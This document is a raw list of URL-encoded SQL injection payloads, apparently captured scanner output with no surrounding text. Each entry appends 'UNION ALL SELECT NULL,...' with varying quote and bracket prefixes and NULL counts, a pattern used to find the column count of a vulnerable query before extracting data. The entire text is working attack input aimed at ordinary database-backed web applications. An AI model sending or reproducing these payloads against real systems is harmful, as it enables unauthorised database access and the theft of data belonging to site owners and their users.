1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 